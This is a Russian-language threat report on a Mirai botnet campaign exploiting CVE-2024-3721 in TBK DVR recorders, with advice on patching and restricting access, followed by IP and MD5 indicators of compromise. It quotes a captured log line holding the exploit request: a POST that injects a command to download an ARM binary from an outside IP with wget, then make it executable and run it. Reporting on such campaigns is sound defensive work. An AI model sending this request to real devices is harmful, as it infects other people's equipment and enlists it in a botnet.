Исследователи Kaspersky Lab обнаружили новую волну атак ботнета Mirai, эксплуатирующую уязвимость CVE-2024-3721 в DVR-устройствах TBK. Эти устройства, предназначенные для записи данных с камер видеонаблюдения, широко используются по всему миру и часто управляются удаленно, что делает их привлекательной мишенью для киберпреступников.
Описание
Атака начинается с отправки специального POST-запроса, содержащего команду для выполнения произвольного кода на уязвимом устройстве. Вредоносный скрипт загружает и запускает бинарный файл для архитектуры ARM32, после чего устройство становится частью ботнета. В отличие от традиционных атак Mirai, этот вариант пропускает этап разведки, так как нацелен исключительно на DVR-устройства с определенной архитектурой.
| 1 | "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F42.112.26.36%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 200 1671 "-" "Mozila/5.0" |
Новая версия Mirai включает несколько усовершенствованных функций, таких как шифрование строк с помощью алгоритма RC4, а также методы противодействия анализу в виртуальных средах и эмуляторах. Бот проверяет наличие процессов, связанных с VMware или QEMU-arm, и анализирует директорию, в которой запущен, чтобы избежать обнаружения.
По данным исследователей, основными жертвами атак стали пользователи из Китая, Индии, Египта, Украины, России, Турции и Бразилии. В открытых источниках обнаружено более 50 000 уязвимых DVR-устройств, подключенных к интернету, что создает значительные риски для их владельцев.
Эксперты рекомендуют своевременно обновлять прошивки устройств и ограничивать доступ к ним из внешних сетей, чтобы минимизировать угрозу заражения. Уязвимость CVE-2024-3721 остается активным вектором атак, и ее эксплуатация может привести к масштабным кибератакам с использованием ботнета Mirai.
Индикаторы компрометации
IPv4
- 116.203.104.203
- 130.61.64.122
- 130.61.69.123
- 161.97.219.84
- 162.243.19.47
- 185.84.81.194
- 192.3.165.37
- 42.112.26.36
- 54.36.111.116
- 63.231.92.27
- 80.152.203.134
MD5
- 011a406e89e603e93640b10325ebbdc8
- 24fd043f9175680d0c061b28a2801dfc
- 29b83f0aae7ed38d27ea37d26f3c9117
- 2e9920b21df472b4dd1e8db4863720bf
- 3120a5920f8ff70ec6c5a45d7bf2acc8
- 3c2f6175894bee698c61c6ce76ff9674
- 45a41ce9f4d8bb2592e8450a1de95dcc
- 524a57c8c595d9d4cd364612fe2f057c
- 74dee23eaa98e2e8a7fc355f06a11d97
- 761909a234ee4f1d856267abe30a3935
- 7eb3d72fa7d730d3dbca4df34fe26274
- 8a3e1176cb160fb42357fa3f46f0cbde
- 8d92e79b7940f0ac5b01bbb77737ca6c
- 95eaa3fa47a609ceefa24e8c7787bd99
- 96ee8cc2edc8227a640cef77d4a24e83
- aaf34c27edfc3531cf1cf2f2e9a9c45b
- ba32f4eef7de6bae9507a63bde1a43aa